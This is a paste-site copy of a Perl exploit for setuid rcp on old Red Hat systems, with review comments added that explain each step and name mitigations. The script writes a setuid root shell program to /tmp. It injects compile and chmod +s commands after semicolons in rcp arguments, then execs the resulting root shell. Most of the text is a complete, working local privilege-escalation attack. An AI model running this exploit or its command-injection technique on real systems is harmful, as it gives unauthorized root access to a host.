UY-Scuti

Untitled

Jul 22nd, 2019
  1. #!/usr/bin/perl -w
  2. #
  3. # exploits suid privileges on rcp
  4. # Not really tested this but hey
  5. # works on redhat6.2
  6. # not werk on freebsd4.1 stable
  7. #
  8. # bug discovered by
  9. # Andrew Griffiths
  10. #
  11. # Exploit written by tlabs
  12. # greetz to those that know me innit
  13. #
  14. # Please set your rcpfile
  15. # this can be found by doing
  16. #
  17. # ls -alF `which rcp`
  18. #
  19. # have a lot of fun
  20.  
  # Path of the rcp binary to inspect. It is read only by the setuid test (-u)
  # further down; the later system() calls run a bare `rcp` resolved through
  # PATH, so the file that is checked and the file that is run can differ.
  21. $RCPFILE="/usr/bin/rcp" ;
  22.  
  23. # configure above innit
  24.  
  # USAGE: prints the script name ($0) and an author credit, then exits with
  # status 0. No call to USAGE appears in the visible script, and the script
  # parses no command-line arguments.
  25. sub USAGE
  26. {
  27. print "$0\nWritten by Tlabs\n" ;
  28. exit 0 ;
  29. }
  30.  
  # Precondition: -u tests the setuid bit on $RCPFILE. When the bit is absent
  # the script prints a message and stops with exit status 0, so none of the
  # steps below run. For a defender this is the first mitigation the listing
  # itself points at: an rcp binary without the setuid bit fails this check.
  31. if ( ! -u "$RCPFILE" )
  32. {
  33. printf "rcp is not suid, quiting\n" ;
  34. exit 0;
  35. }
  36.  
  # Appends C source to the fixed path /tmp/shell.c. The generated program
  # calls setuid(0) and setgid(0) and then execl()s /bin/sh. The file names
  # /tmp/shell.c and /tmp/shell are hard-coded, which makes them usable as
  # file-system indicators when reviewing a host.
  37. open(TEMP, ">>/tmp/shell.c")|| die "Something went wrong: $!" ;
  38. printf TEMP "#include<unistd.h>\n#include<stdlib.h>\nint main()\n{" ;
  39. printf TEMP " setuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\",\"sh\",0);\n\treturn 0;\n}\n" ;
  40. close(TEMP);
  # Creates a file named "hey" in the current working directory; that name is
  # the first word of the argument given to rcp below.
  41. open(HMM, ">hey")|| die "Something went wrong: $!";
  42. print HMM "Sploit written by tlabs, thanks to Andrew Griffiths for the bug report" ;
  43. close(HMM);
  44.  
  # Each system() call hands rcp one single-quoted argument that contains file
  # names followed by ';' and a command, plus "localhost"; stderr is discarded
  # and the return status is not checked. The first command compiles
  # /tmp/shell.c to /tmp/shell, the second runs chmod +s on the result.
  # NOTE(review): how rcp processes that argument is not visible here. The
  # header says the script abuses rcp's setuid privileges, so presumably the
  # affected rcp passes the string to a shell while still privileged; confirm
  # against the vendor advisory for the platform in question.
  45. system "rcp 'hey geezer; gcc -o /tmp/shell /tmp/shell.c;' localhost 2> /dev/null" ;
  46. system "rcp 'hey geezer; chmod +s /tmp/shell;' localhost 2> /dev/null" ;
  # Removes the C source and the files "hey" and "geezer" from the working
  # directory ("geezer" is never created by this script; presumably it is a
  # by-product of the rcp calls). /tmp/shell is not removed and stays on disk.
  47. unlink("/tmp/shell.c");
  48. unlink("hey");
  49. unlink("geezer");
  50. printf "Ok, too easy, we'll just launch a shell, lets hope shit went well, innit:)\n" ;
  51.  
  # Replaces the Perl process with /tmp/shell; on success exec does not return.
  # Nothing above verified that either rcp call did anything, so the binary may
  # be missing or may lack the setuid/setgid bits. Hardening notes: the whole
  # chain relies on a setuid/setgid file under /tmp taking effect, which a
  # nosuid mount of /tmp prevents, and on rcp carrying the setuid bit; a
  # setuid/setgid /tmp/shell left on disk is the persistent trace to look for.
  52. exec '/tmp/shell' ;
  53.  
  54.  
  55. # milw0rm.com [2000-11-29]